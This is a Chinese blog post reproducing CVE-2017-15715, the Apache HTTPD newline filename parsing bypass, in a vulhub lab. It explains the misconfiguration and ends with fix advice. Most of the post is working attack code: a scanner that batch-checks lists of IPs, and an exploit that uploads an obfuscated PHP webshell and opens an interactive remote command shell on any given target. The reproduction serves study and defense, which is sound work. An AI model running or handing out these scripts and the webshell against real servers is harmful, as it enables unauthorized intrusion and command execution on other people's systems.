0x00前言
靶场打着有点无聊就来看看中间件的漏洞,先从apache入手
0x01漏洞描述
Apache HTTPD是一款HTTP服务器,其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.phpx0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。该漏洞属于用户配置不当所产生,与具体中间件版本无关。
0x01复现环境
vulhub进行复现,直接docker起很方便
cd vulhub-master/httpd/CVE-2017-15715
docker-compose up -d
访问就可以看见环境启动成功了
然后来看一下环境源码
docker ps
docker exec -it 容器id /bin/bash
<?php
if(isset($_FILES['file'])) {
$name = basename($_POST['name']);
$ext = pathinfo($name,PATHINFO_EXTENSION);
if(in_array($ext, ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'])) {
exit('bad file');
}
move_uploaded_file($_FILES['file']['tmp_name'], './' . $name);
} else {
?>
很明显,过滤了php后缀的文件
然后我们来看一下配置文件
<FilesMatch \.php$>
SetHandler application/x-httpd-php
</FilesMatch>
DirectoryIndex disabled
DirectoryIndex index.php index.html
<Directory /var/www/>
Options -Indexes
AllowOverride All
</Directory>
意思是把以“.php”为后缀的文件内容当作PHP代码进行解析,但是却使用了“$”进行文件匹配,这就导致了漏洞的产生。这个符号在正则表达式中是匹配字符串中结尾的位置,若存在换行则匹配换行符为结尾,也就是说可以利用换行符使“$”与其匹配从而绕过黑名单机制实现文件上传。
\r,0x0d,CR代表的是回车,也就是光标位置移动到该行的起始位置
\n,0x0a,CL代表的是换行,换行到下一行的行首位置
换行绕过漏洞的话只有0x0a有用,而0x0d则不起作用
0x02复现经过
创建一个shell.php
内容为
<?php system('ls /'); ?>
然后上传,修改上传名字为shell.php
给重发器,因为过滤的文件名,所以手工给文件名加个空格后缀
然后在16进制把空格的20改为0a
发现成功上传
然后访问,绕过成功
漏洞复现完成
0x03POC和EXP脚本
这里借用纸机师傅的exp和poc
POC代码
#CVE-2017-15715-POC
__author__ = '纸机'
import requests
import optparse
import os
parse = optparse.OptionParser(usage = 'python3 %prog [-h] [-u URL] [-p PORT] [-f FILE]')
parse.add_option('-u','--url',dest='URL',help='target url')
parse.add_option('-p','--port',dest='PORT',help='target port[default:8080]',default='8080')
parse.add_option('-f',dest='FILE',help='target list')
options,args = parse.parse_args()
#print(options)
#验证参数是否完整
if (not options.URL or not options.PORT) and not options.FILE:
print('Usage:python3 CVE-2017-15715-POC.py [-u url] [-p port] [-f FILE]\n')
exit('CVE-2017-15715-POC.py:error:missing a mandatory option(-u,-p).Use -h for basic and -hh for advanced help')
filename = '/2.php%0A'
headers={
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
'Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'
}
#提交数据
data = '''-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="file"; filename="2.php"
Content-Type: application/octet-stream
aaa
-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="name"
2.php
-----------------------------153388130435749919031880185481--'''
#验证链接
#url2 = options.URL+':'+options.PORT+filename
def upload(url):
try:
#上传文件
resp = requests.post(url,headers=headers,data=data)
return 1
except Exception as e:
print("[-] {0} 连接失败".format(url))
return 0
def checking(url):
try:
#验证文件是否上传成功
response = requests.get(url+filename)
if response.status_code == 200 and 'aaa' in response.text:
print('[+] {0} 存在CVE-2017-15715 Apache HTTPD 换行解析漏洞'.format(url))
else:
print('[-] {0} 不存在Apache HTTPD 换行解析漏洞'.format(url))
except Exception as e:
print("[-]{0}连接失败".format(url))
if options.FILE and os.path.exists(options.FILE):
with open(options.FILE) as f:
urls = f.readlines()
#print(urls)
for url in urls:
url = str(url).replace("\n", "")
if upload(url) == 1:
checking(url)
elif options.FILE and not os.path.exists(options.FILE):
print('[-] {0} 文件不存在'.format(options.FILE))
else:
#上传链接
url = options.URL+':'+options.PORT
if upload(url) == 1:
checking(url)
然后测试一下
然后-f可以批量扫ip
exp代码
#CVE-2017-15715 EXP
__author__ = 'zhiji'
import requests
import optparse
import time
parse = optparse.OptionParser(usage = 'python3 %prog -u url [-p port] version=1.0')
parse.add_option('-u','--url',dest='url',help='web server ip_addr')
parse.add_option('-p','--port',dest='port',help='web server port[default:8080]',default='8080')
options,args = parse.parse_args()
#验证参数是否完整
if not options.url or not options.port:
print('Usage:python3 CVE-2017-15715-EXP.py -u url -p port\n')
exit('CVE-2017-15715-EXP.py:error:missing a mandatory option(-u,-p).\nUse -h for basic and -hh for advanced help')
#ip = '192.168.132.142:8080/'
filename = '/hackdoor.php%0a?0='
#上传链接
url1 = options.url+':'+options.port
#命令执行
url2 = options.url+':'+options.port+filename
#数据包头部
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0',
'Content-Type': 'multipart/form-data; boundary=---------------------------153388130435749919031880185481'
}
#上传数据
data = '''-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="file"; filename="hackdoor.php"
Content-Type: application/octet-stream
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
-----------------------------153388130435749919031880185481
Content-Disposition: form-data; name="name"
hackdoor.php
-----------------------------153388130435749919031880185481--'''
#上传木马
def upload(url):
print('[*]目标地址:'+url1)
respond = requests.post(url1,headers=headers,data=data)
try:
if respond.status_code == 200:
print('[+]木马上传成功')
else:
print('[-]上传失败')
except Exception as e:
print(e)
#命令执行
def attack(url,cmd):
respond = requests.get(url+cmd)
try:
if respond.status_code == 200 and cmd == 'pwd':
return respond.text
if respond.status_code == 200:
print(respond.text)
else:
print('命令执行错误')
except Exception as e:
print(e)
upload(url1)
time.sleep(0.5)
print('输入执行命令(quit退出):')
while(1):
pwd = attack(url2,'pwd')
pwd = '{0}>'.format(str(pwd).replace("\n",""))
cmd = input(pwd)
if(cmd == 'quit'):
break
attack(url2,cmd)
测试一下
注意:在windows系统不行,因为windows操作系统不允许后缀以换行符结尾的文件命名方式,所以文件会创建失败。
0x04修复建议
- 升级到最新版本
- 对上传文件重命名
- 禁用上传文件的执行权限
0x05参考
声明:本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担! 本网站采用BY-NC-SA协议进行授权!转载请注明文章来源! 图片失效请留言通知博主及时更改!